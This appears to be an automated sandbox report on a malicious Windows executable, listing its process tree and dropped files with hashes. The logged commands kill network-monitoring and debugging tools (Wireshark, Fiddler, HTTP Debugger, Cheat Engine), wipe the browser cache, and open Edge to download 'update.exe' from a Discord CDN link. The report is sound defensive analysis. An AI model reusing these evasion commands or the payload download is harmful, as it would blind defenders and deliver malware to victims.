C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.8.1\manifest.fingerprintFilesize
66B
MD5df6d3c65ee273b748beb53aecb7f979c
SHA18e48bcc7c483c672fe4c6b6fd373d4c69dd9b152
SHA256e07d33054ff7ba6e5e27a21f314a772bd616cd856a242b24c6f08a41df1fcf82
SHA5128ad62912d1baf95ce7b8bc16f7fce3533473e54d2bb804f786be62387c0af407640b24e7510d77e476daeede69b6d6ef4708f43c81a8dd99a5a06bbc47180886
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.8.1\manifest.jsonFilesize
113B
MD5a10686bb3ebc4154802435e02e63566e
SHA12c2ceca7de17afe8158aa6871cf478d626bf2567
SHA256e4f9de4706ae0bf6e2337a809a74e20af126936e992d58a8ef11cad83f1e8bfd
SHA512aa39d19dffc9e85323378578c314fddca140971c0a0f0322f55b8c672397794413073bd5271fa3656a04a73aee90ae8e8aae5eae69d457dd1ccc46707c88f245
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5962644599f0c746e1b17a064c670d314
SHA173ccfa471325f9fe38767edab76fa81e95565eed
SHA25612a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966
SHA512cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD56f68dcae6f4a541f555228c3f00d41d9
SHA18538053657ae58f190cde71d29e3da5177bbde61
SHA2567db741e4af2e6646a5051c86e792f2cacfa3a9d5c363359b2d7bddba735f8ae4
SHA5127d50ed9f59a2dc71ecd6a264ea4a36eca3c89573aa1df712ea02b032ccc41eedfc347ae82938e697fb569eb328bc10f54012c221737aec1d52a5f13a66325cda
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\the-real-indexFilesize
48B
MD5fd7d226c73b452c8cf1a42821b72f42f
SHA10ec7eac283298450745c678761fd1e8f6a179f0c
SHA2561c2466a3be9fac8686e594b12eb98264459d5f998c2febecf9dc9d4317e78ecc
SHA5120902ca6ea350b2f8b89cd0c15d64601fc26c350c2fd00e79f3ccd923d44f8880a61953152bc617a06d12bce9d4ed2a4c47221a3c3832d4041c628b5abceb35e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD51062e3bde5a46f8ef16c1123566f4aa9
SHA18026c8e4736507c24be591363ac663f7baf9f483
SHA2561941c231db5a23698348e22926d927f5392ce3664e816ec346eda704b8941e63
SHA5120c80b39a8ff68d0a4e812151e42903a68ec2fc70c1af04f2567cbcbefdc74ddf453c3249d325e3be08d6dd089bcba3802e9fd866c843fd6bd8c7fc316d5d7f4c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\FaviconsFilesize
20KB
MD56170970548a919117305b50b3cb6671c
SHA13f457d652f1fe6da834f6db66597f40de08e30d2
SHA256b8eaa7e063758bb27118f5a38a8f4d4c89b88ab446317d74752902fb9a8c800f
SHA5127b4f557b37bc6089915b775412796c6839b145899de7321b4d4ddb011f2aceb1faaf839796b6c1b8ffa921f9627276b326d349ac55c203467a64f6539176a6df
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0Filesize
8KB
MD5cf89d16bb9107c631daabf0c0ee58efb
SHA13ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA5128cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1Filesize
264KB
MD51771a3f6a54e1f1f91c5fd90df0f76e1
SHA1611070f8fff13f6bb55c85eee8645b09fe01caa4
SHA25628e9bcf1d044ed602396c1017825ca6416656e87985368515d30b86e0973378f
SHA512e7aa9103806151537d4dbd6bb88720e95016bb7286d6a28c8458e9f065f811c0ffd63c1198b12d13c214410a113b97062b68d7611c61620bdb227df6acdee7f1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3Filesize
8KB
MD541876349cb12d6db992f1309f22df3f0
SHA15cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\indexFilesize
256KB
MD538dfa8ed69ba0a9487da5cc66c4974d7
SHA190272ec22b96b6f5c5beb9963b7538bf59484e50
SHA25620a9c3fd4d8189a0829bef6872cc4506db952fadfcb5505cf0ecb50c1225efb1
SHA5126b3157e57571b36c39272650c702fc616aed0f07688be31f344ab948f293d9e2329992d1c753a1199fc3d45afde79f879c426d8c41aa18c7ba33c6741607c7c6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD5dc3bd06f5a6790e667b647007f6ad72f
SHA1220e8390ff60e6461feca96dfd8c62eec7b2b87b
SHA256af82555fdf14c4ea58e08563f298f3edfdff2bdc23e98b5d56cf1050abeb62df
SHA512bdfa5586b2799b28f2afd6ba3b3329756c9a75704d664c3718c1b36cb6159d54d69db4eeec008c0f2f15bf9a39814817317940db4c71e2af9afd0618bef9eba0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider CacheFilesize
6B
MD5a9851aa4c3c8af2d1bd8834201b2ba51
SHA1fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA51241a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logFilesize
8KB
MD50b78d42178eb97158b347ac11f37cfaf
SHA1b60b5be28ea33748ae021e0f44b187baaf731345
SHA256b213716767522e2c5510c82d8d8689706c37a146478134a137b368b1c28fb449
SHA512b73b862e23d137383d53919da9e5095696aa19812e9bf4f904211b8290330247c984acc5b6d4ba0b065ad0c08ab04eac7f076fe3b023a8c4e8fac390757ebc35
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
331B
MD5edbfb8a564f22688c67d7ff0bdd47a8d
SHA1edafacad98ebca8745a9288e5507eecdec458ba9
SHA256433b035ae022c4a81cffb35f64e3ea5fec5bb4c4ec7d0753d88196b358e2de85
SHA512f7124f4f8925fc0ff1308064a9aa31b88358908d4e9a767a61b34f0292b4261905a79f979fad8f3a6c95a9ead21c8321aa1ec9cfcacc70de22d759e94e6d1888
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5efdddcfed87937127a8d4987099ec052
SHA11378a1901665d5b7d56fa725a1bdc26b368b7706
SHA256754fab0b90814e80acf7b8d82520c563f5a71c4d040e3c75be4aed409e577a14
SHA5120592563a65bdbb4cc702b54c2c90e0b8b558199028f798d0a0848e508ac6b97a837eb5455176798c87ee73397b7402bf3d931bb526969e5cde55e772ea227fd3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5545b8a4d34e0b066e4a604a6485a7f6d
SHA199124e047bd140bd87bd5482df332ef9282db2f7
SHA2564628e41d29bd61e5ce892f444ad5dc0b291040c8539e077a4549db88df94b6e5
SHA512cfabe12c401694fd8117f587b74cba9225f3e3ceee02b5a17642051d8b52abec0b85aeef9665b01f1cdda447d296de8c4c55394dc102111c0d24d7b15d541d16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD5d6f03946d756e115f6273b19bac0379e
SHA186e990d53d81966281788dfaf2f994fd1adff785
SHA256c4dace714e72baf9419c339fc2f217b04ea8cee98cf5e470aed86e5ebd6a5b35
SHA512725e8aa05db851bfe91c2d0f89233ac88f28a0da110ef676942bca5d3a0048ba420dbd4bda485a7cea387e17b37d603a9e5e2d98074854fb272196dd42484e70
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.logFilesize
812B
MD5a3926ea440b809cee219387189262158
SHA1edaa5b44f2acb3777f74fdbf39e365ba7fd4974f
SHA256fcfe8c31337371ec518bfe82518c04731c1defafd69350fa6f4dfe72165299d7
SHA5125a204010f027b865c21100cf6fe6e7b047440a0c58d8397515cb929467224897c1d16dfafcfd661de972b37768304baf89374d796d0a25c191e9dfd0b448b4bd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOGFilesize
297B
MD5707fb1a22b3e1cf389cf412ec645cb48
SHA18c28cbe3a0bca369bda10b906275776c91d6b27f
SHA2564548c348f492097ee8f6035997f9b14960a6b357fec44d77ad42d01537cf8d7c
SHA512ea761619e2f3d79e28beff24bf19ed714f794215ae6fa4c16364255d19bb9a085d426a9fac1996b9881dc9ad1e2c7ef50f07a686b945fc95c2392c77bc43aedf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.logFilesize
112B
MD536d7667fb88565281461f00fbb8a61a7
SHA1a0dbbce1e7c158c9be15409a4770cc8b16d9156a
SHA256f8d53ca6783cefd2bc3d5da2f745974d0a2e571d945ec233713d7213c7213162
SHA5128f23d5e34ca1cd101e8495c7bb6dafb01013aa6b9c4f6dc04f992dece91dfdf50703de07e91bfd61428bc1a335f5f9e38b38a55f5cbeadce68a8c81bea1f5f06
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
347B
MD53c22f1fbc63819a62ab4e330aa71c9b9
SHA1edf1981510f535b7c46fdcd9b690eed60a841436
SHA256cf9433058ae4d930446ada73dddcd5af098a2b2c81258c94e955b993fff4a0e3
SHA512060c971981854f7bd6aa5ee0329c5c7f176c64147447328c11b931f235879849c4a62c15ec619443a2b8c48d711d8b3fab40e71babacf7dded5898563c226b78
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
323B
MD5ce3f7488f1269ca390fa81be023f6747
SHA1f61d673e9809c5643b3dfa2d4c3c824ff43f6ad2
SHA256fde1290f4d0085e90d2fb24e7e76ac39a8c0d9c52426e005e2435bd3779337ed
SHA51290aa35432de8a3369c6f0b1f1829770ffb913436bf261932337d650ac0147a0176e00460e0f8611f081093950ab77451c0c869fa5c557e43bf379a05f795107b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Top SitesFilesize
20KB
MD5f44dc73f9788d3313e3e25140002587c
SHA15aec4edc356bc673cba64ff31148b934a41d44c4
SHA2562002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983
SHA512e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited LinksFilesize
128KB
MD5d9c29ceb260b45ca053e1e6bea017931
SHA1a91172b331ea95fea92213844719b56ae1f7bb5d
SHA2561bfbde06adb2893e3879152f5a37c1021a3bfb1ae1a7f32428b673ebc70213f3
SHA512652ac0ca99b401d8f2a4786d22adbb1e0d64a614c978cf2c1133be2a6a5adf676bb68fbfe1cc01648875103cdbf4cb3bc4dd671eaab5b732ac4812db9e70f65b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web DataFilesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.dbFilesize
52KB
MD53d272de11b92ba7619986c4e4353ac9b
SHA1c4cbab5c2d1e838f230dffaf6335c60883abfafd
SHA256bbf744d4039bc22efab1b23444bb87053fb7021783bbf688bf2f89d7b862dcf8
SHA512d133e52f8d71035800c3f1d4409f11ada4662699901ac1bb49d6a9e480f7e55388785510479d0238fc43da7ce602d46cfedba90e1d68b1903f1608c81a7bf6bc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOGFilesize
297B
MD55c45b171a72a6a18c672eb01fd28a5c8
SHA1de4fafbcda096558e3428e80cfba2e1a77b7d790
SHA2565415ad19cfc78fa3a43b05ac12dbe454f859843b634c66d6c9f5af29b7a97bfb
SHA5122986d2ffaecd1d769a29c624c330a8c3b83a0a36b09b187d7159984fd91467145845eaf11602dc76c05252b13ebe4bf74631a7af2870305083446acf5417dbf7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1Filesize
264KB
MD5b88cfd3c9d99884ed0a6a4f3a7d404bf
SHA1deff07f3834b246b6db4cc85f8c0691e3209ec24
SHA256265df437e2aebb96078819cb8a9bec86c31ae530d981bb4bbce796f2b634ab16
SHA5121f5c85f1547762556f798f7377f8cc456722822e010ed9ae490feff95eccb0981f2f3dcae5d0b3083bffe107f91f9bff424e9007367e106bf9a5c214508e5f75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last VersionFilesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD5651be1f5625542914f87b9d702fffcc1
SHA153fd658219aa5883184d1ab75a994c2e5a1e3ea2
SHA256f43c64561d9c36e1603cda4fee1010253aae260e6c0e7cf3d1207285e0ae3306
SHA5121cfbe6f73e1d3d6290e51219e5ecf851ba94dc7137e79d34cbc2aaff993696b6155aa9c69baa745bfb26f7af2c4eaa76aba6a27e9b2d8011fc8328657929d6f4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1Filesize
264KB
MD5767890cc470174b513308e9e648d36d2
SHA1ab6765e638baaad7a74d98fb5510c8db2db771b2
SHA256727b57fe7039b522c7415b24e99631470b267e42236eb048372dde7c5b5e10c9
SHA51253beb1edd38141d88dc2dbedad63480953cf47cd423bbc38eb6095c7c2f2c539f946ee5d568d57cd4cc64ab3f648c2c7b410eab8529cfc484068be1b2a207405
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettingsFilesize
81B
MD5f222079e71469c4d129b335b7c91355e
SHA10056c3003874efef229a5875742559c8c59887dc
SHA256e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00
SHA512e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1Filesize
126KB
MD56698422bea0359f6d385a4d059c47301
SHA1b1107d1f8cc1ef600531ed87cea1c41b7be474f6
SHA2562f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
SHA512d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUrisFilesize
40B
MD596aa8b0db9bd3589576676d4dab632ca
SHA1ebbcc44a394ac6cbe618e5d7a22e14a964d086ef
SHA2562d01dd11aa5bd4e52e60d78726482c633a22e61fe72e9689dea1a383c3694da7
SHA5126af3643ddcc85c8f244e39f1aeffa6e59c7a7901650701bdc32a3e7845c58f947df9b7a8f1f9510cc5534c8a079228c2cc1a6fd8ea6d6bf3fe77ef591d30ed0c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637983256491019922Filesize
4KB
MD5a5f9cd2afcd31cfe11e3f584ebe3a4be
SHA167a8bf5673c6459bf07d6c6b9ce79c3aa2ce491a
SHA256d92eb95e8e50deb7b0e7f470b25b00d572760f7b39b8ad42d76013c80224b4ee
SHA512e9568bce46f4ff0c6b81be1da7726e9a5c6d9544b857d9e806016affd1e234a942bb0860e04f84aa42b0f81a632018d42931929b2e0b63401484337028a4f5f2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTrafficFilesize
29B
MD5ce545b52b20b2f56ffb26d2ca2ed4491
SHA1ebe904c20bb43891db4560f458e66663826aa885
SHA256e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899
SHA5121ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684Filesize
450KB
MD5a7aab197b91381bcdec092e1910a3d62
SHA135794f2d2df163223391a2b21e1610f14f46a78f
SHA2566337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b
SHA512cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA14267af836b75278f22724a6864525efd60597781
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA14267af836b75278f22724a6864525efd60597781
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA14267af836b75278f22724a6864525efd60597781
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA14267af836b75278f22724a6864525efd60597781
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA14267af836b75278f22724a6864525efd60597781
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
\??\pipe\LOCAL\crashpad_2104_XQIFEABJVWLYZSPOMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_5112_CKKZDEACZPNRXBEMMD5
